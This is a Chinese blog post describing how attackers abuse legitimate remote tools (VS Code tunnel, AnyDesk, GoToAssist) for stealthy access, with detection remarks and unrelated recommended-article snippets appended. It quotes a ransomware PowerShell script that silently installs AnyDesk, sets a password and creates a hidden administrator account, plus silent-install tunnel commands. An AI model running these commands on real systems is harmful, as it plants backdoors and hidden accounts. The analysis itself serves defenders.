滥⽤合法商⽤程序⽤以进⾏访问控制

合法工具下的攻击:VScode、AnyDesk与GotoAssist的隐秘远程控制
最新推荐文章于 2024-02-07 12:00:00 发布
原创 最新推荐文章于 2024-02-07 12:00:00 发布 · 700 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #网络

本文探讨了攻击者如何利用Vscode、AnyDesk和GotoAssist等合法工具进行远程控制,通过合法签名隐藏攻击,给防御和检测带来挑战。作者强调了这些商业控制软件的隐蔽性和功能,以及如何通过终端日志识别潜在威胁。

背景

攻击对抗日益激烈的局势下,安全产品的围追堵截使得攻击者将目光逐渐转向合法工具的滥用。通过使用具有合法签名的应用程序进行访问控制可以有效提高攻击隐匿性,也对防守及检测提出新的挑战。本文以Vscode、AnyDesk、GotoAssist为例探索攻击者用于访问控制的一些合法程序。

01 使用Vscode进行远程控制

VScode作为常见编辑器,其具有远程连接功能,官方提供免安装版CLI客户端无疑给攻击者的滥用提供了便利。

通过命令行调用tunnel模式,攻击者可以便捷的启动受控端。code.exe tunnel --accept-server-license-terms --no-sleep --random-name

使用返回的认证码进行登录认证:

认证成功后使用返回的控制地址即可进行访问控制:

使用VScode进行远程控制,Agent端会与github进行通信,融入正常业务的与可信域名的C2通信配合其合法签名的应用程序,在受害者为IT部门或是服务器时会使防守方难以察觉。

02 使用AnyDesk进行远程控制

作为一款商用远控软件,有大量企业或是员工个人会在工作中使用AnyDesk进行远程办公,这就导致攻击者可以鱼目混珠使用AnyDesk作为后门进行远程攻击。从开源情报分析可以看到勒索组织有使用AnyDesk进行攻击的PS1武器脚本:Function AnyDesk { mkdir “C:\ProgramData\AnyDesk” # Download AnyDesk $clnt = new-object System.Net.WebClient $url = “http://download.anydesk.com/AnyDesk.exe” $file = “C:\ProgramData\AnyDesk.exe” clnt.DownloadFile(clnt.DownloadFile(clnt.DownloadFile(url,$file) cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent cmd.exe /c echo b4ouDLG9trr | C:\ProgramData\anydesk.exe --set-password net user WDAGUtilltyAccount “qv69t4p#Z0kE3” /add net localgroup Administrators WDAGUtilltyAccount /ADD reg add “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist” /v WDAGUtilltyAccount /t REG_DWORD /d 0 /f cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id }

通过Powershell远程下载AnyDesk并静默安装后便可以远程访问:

但同时客户端也会在本地日志中记录连接的信息,意味着在连接的同时,攻击者的包括来源IP等信息会记录在目标机器,为溯源等操作留下便利。

03 使用GotoAssist进行远程控制

因为AnyDesk的局限性以及隐蔽性问题,攻击者开始把目光转移到新型云平台远控软件,以GotoAssist为例,其便于安装的客户端,以及安装后自带的服务自启动,使得攻击者可以更隐蔽的进行渗透。

下载无人值守模式安装程序后,通过MSIEXEC进行静默安装后,可以使用web端直接连接:msiexec /i GoToAssist_Remote_Support_Unattended.msi /quiet

默认安装后GoToAssist会创建自启动服务,可以起到权限维持的效果:

04 总结

相比于传统C2在正面与杀软对抗,使用商用控制软件进行隐秘渗透不失为一种思路。合法的通信使得防守设备会难以分辨攻击者的流量与正常业务流量,而商用控制软件大多都带有完整的一套功能,包括文件管理、远程桌面等,此类功能也方便了攻击者进行渗透活动。商用控制软件有着较为明显且固定的通信地址,检测难点在与区分使用者是否为合法人员,终端侧的日志捕获或许是一个思路。

显且固定的通信地址,检测难点在与区分使用者是否为合法人员,终端侧的日志捕获或许是一个思路。

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【扫下方二维码】免费领取:

03142《互联⽹及其应》各章简答题解答(课后习题)
Allen
10-24 973
03142《互联⽹及其应》各章简答题解答(课后习题)互联网是建立在一组共同协议之上的网络设备和线路的物理集,是一组可共享的资源集。(1 分)以 TCP/IP 协议行数据通信,(1分)把世界各地的计算机网络连在一起,实现信息交换和资源共享。(1 分)它包括基于TCP/IP 协议的网间网;使用和开发这些网络的用户群;可以从网络上获得的资源集。下一代互联网(NGI),顾名思义就是不同于现在的互联网的互联网,其主要特点有:更大、更快、更安全和更便捷。
AnyDesk可无人干预的远程桌面控制软件
09-09
可以远程控制多台电脑,对方可无人值守,方便管理
网络安全0-100》第三方远控软件在渗透中的利用
一只正的博客
08-11 533
看到这你惊掉了下巴,不会免杀,世面的免杀也无法过这些杀软,也无法添加用户行RDP。这时你就可以选择借助远控软件如向日葵、TeamViewer、toDesk、AnyDesk(这个国外用的比较多,别问我为什么知道)等方式远程服务器。
用vscode-tunnel配置远程开发环境
qq_44089890的博客
05-08 2693
VSCode Tunnel 是一款用于远程开发的 Visual Studio Code 扩展程序。它可以通过 SSH 隧道将本地的 VSCode 编辑器连接到远程服务器,并在本地编辑器中直接行远程代码开发、调试和部署。使用 VSCode Tunnel 可以帮助开发人员避免在本地安装和配置开发环境的繁琐过程,同时也可以提高代码开发和调试的效率。远程编辑器连接VSCode Tunnel 可以通过 SSH 隧道将本地的 VSCode 编辑器连接到远程服务器,实现在本地编辑器中行远程代码开发、调试和部署。
Nagios远程监控软件的安装与配置详解
cnbird's blog
12-29 824
 http://netsecurity.51cto.com/art/200706/48728.htm
内网渗透-使用anydesk行远控
dzqxwzoe的博客
08-21 460
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
简单实用远控小工具Todesk
Ms08067安全实验室
11-03 3079
前言之前写过anydesk远控,然后在一次测试中,在客户那边看到一个远控软件–Todesk,然后就去官网下载下来研究了一下。准备工作在开始测试之前先查看官方文档。支持静默安装可设置安全密码我们看到todesk支持命令行静默安装,和设置安全密码,而安全密码和临时密码都可以行连接。本地测试环境:windows2012R2。工具:冰蝎3、todesk安装包。我们在本地搭建环境行测试,这里利用冰蝎作为...
这道题是如何想到使用区间dp的啊题⽬描述 Bessie 正在学习使⼀种简单的编程语⾔编程。她⾸先定义⼀个法的程序,然后执程序以产⽣⼀些输出序列。 定义: ⼀个程序是⼀个⾮空的语句序列。 ⼀个语句的形式或者是 "PRINT ",其中 是⼀个整数,或者是 "REP ",随后是⼀个程序,随后是 "END",其中 是⼀个不⼩于 1 的整数。 执: 执⼀个程序将依次执其语句。 执语句 "PRINT " 将使 追加到输出序列中。 执以 "REP " 开始的语句将依次执内部程序共 次。 Bessie 知道如何编写的⼀个程序⽰例如下。 REP 3 PRINT 1 REP 2 PRINT 2 END END 该程序输出序列 。 Bessie 想要输出⼀个包含 ( )个正整数的序列。Elsie 挑战她使不超过 ( )个 "PRINT" 语句。注意,Bessie 可 以使任意数量的 "REP" 语句。同时注意,序列中的每个正整数都不超过 。 对于 ( )个独⽴的测试例中的每⼀个,求 Bessie 是否可以编写⼀个程序,使⾄多 个 "PRINT" 语句输出给定的序列。 输⼊格式 从 print.in 中读取数据 输⼊的第⼀包含 。 每⼀个测试例的第⼀包含空格分隔的两个整数 和 。 每⼀个测试例的第⼆包含⼀个由 个空格分隔的正整数组成的序列,每个数都不超过 ,为 Bessie 想要产⽣的序列。 输出格式 将答案输出到 print.out 中 对于每⼀个测试例输出⼀,包含 "YES" 或 "NO"(⼤⼩写敏感)
最新发布
09-25
由于序列A是由程序运行产生的,而程序中的REP语句会重复其内部程序多次,因此序列A必然具有某种重复性。 重要特性:程序执行产生的序列实际上是由一些基本片段重复构成的。嵌套的REP会导致多重重复。 如何判断...
上市公司修订章程制定反收购措施的法律效⼒及作.pdf
04-12
### 上市公司修订章程制定反收购措施的法律效力及作用 #### 一、背景与案例引入:“宝万之争” ...未来,随着相关法律法规的不断完善,预计会有更多的上市公司采取类似措施,以维护公司和股东的法权益。
百度增通监测回调&转化回传案例
05-15
当用户的特定行为触发条件后,百度平台会将相关数据以 POST 或 GET 方式发送至该 URL。 - **安全性保障** 为了防止恶意攻击者伪造回调请求,通常会在回调参数中加入签名字段。签名算法可能基于 HMAC-SHA256 或...
如何使用anydesk行远程控制?来长知识
MSB_WLAQ的博客
10-08 5448
行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放也就表示我们无法使用远程桌面行连接。但是依然有很多第三方远程控制软件可以帮助我们,例如Teamviewer或者AnyDesk。 本片文章我们将使用Cobalt Strike配AnyDesk行演示。 首先上线cs 这里我们使用powershell上线,首先我们使用Payload Generator生成一个ps1脚本 然后在目标机器上执行:(使用管理员权限执行) powershell "$a='IEX(Ne..
三款软件的AU3无人值守安装代码
01-22
通过三款基础软件的AU3无人值守安装代码,让一些想学习AU3的人了解一下AU3软件的基本情况。
一款强大的手机远控软件,无需ROOT
12-01
说明:软件安装完后桌面会出现 系统网络服务 的图标,先不要隐藏,设置好邮箱参数,测试下,正常后再行隐藏!不需要ROOT!!! 注明:邮箱里的SMTP需要在自己邮箱里行开启,不会的请自行百度!!
内网远程控制——anydesk
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
02-07 3599
而通常这个时候我们有权限修改anydesk的配置文件,这里行测试,起两个虚拟机,设定一个场景(攻击机拿到了webshell,受害机开着windows defender,如何去渗透拿到受害机权限)
VS Code Tunnel 使用
You_are_my_zing的博客
02-23 4733
VS Code Tunnel
【RdViewer】强烈推荐的免费远程控制软件
qq_41842881的博客
07-23 3710
在测试的各种远控软件后,我感觉RdViewer是最良心的,软件轻便、运行速度快、占有内存小,最重要的是个人免费,客服反应速度快,能及时的反馈更新。 软件性能 我目前尝试的几款远控软件有RdViewer、TeamViewer、向日葵、ToDesk等。TeamViewer的价格是真的狗,我一般来说使用的都是正版软件、可以及时地更新软件,当然支持一下也是必要的,但是TeamViewer是真的不友好,原谅我一个学生实在是买不起,直接Pass。 下面是几个软件远程屏幕时性能对比数据: RdViewer和向
tplink控制上网设备_远程协助 | 查看孩子设备,帮助孩子解决学习问题
weixin_32019577的博客
12-31 696
▲ 儿童上网行为健康管理平台 ▲孩子上网遇问题,网课作业要提交爷爷奶奶难操作,家长在外帮不上焦头烂额干着急!那这到底怎么办?青松守护远程协助功能来帮您!青松守护| 远程协助随时随地远程操控孩子设备,帮助孩子解决学习问题,支持网段远程、静默远程,协助孩子更高效!1一键静默远程家长上班,就怕孩子在家偷偷玩游戏!青松守护远程协助功能“青松”搞定!家长入青松守护控制中心,不需要孩子同意,...
2019-01-12-anydesk-远程连接后鼠标无法操作
热门推荐
小肥的胖
01-12 2万+
teamviewer说我商用,不让我用了,NND。抛弃teamviewer,找了一下,发现有个anydesk不错。 过程中出了一个小插曲。两台机子,PC-A, PC-B, A连B没问题,B连A就出现如下图:鼠标右下角出现了一个 Administrator,然后点击屏幕无效。 出现了这个问题,我以为是权限问题,查了一下AB两台机器的登录情况,发现 A连B,用的是Administrator B连A...
免费远程办公软件亲测
weapon14的博客
05-20 807
最近的情况大家都了解,因受疫情影响和个人工作的原因,时髦的体验了一把远程办公。所以测试了很多免费的远程软件,特别标注一下,方便自己汇总。 一、teamview 最开始使用的远程办公软件,使用方便,功能强大,但由于被检测为商业用途,无法使用(没错,在家控制单位电脑,就算商业用途,不管你控制几台电脑,我怀疑是我在单位安利的teamview太多了,所以被检测了IP)。而个人用户购买商业版实在太贵了(1500大洋),无奈放弃。并且最近teamview的连接总有问题(国外软件),获取个人ID得好久,或者总是提示“无法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值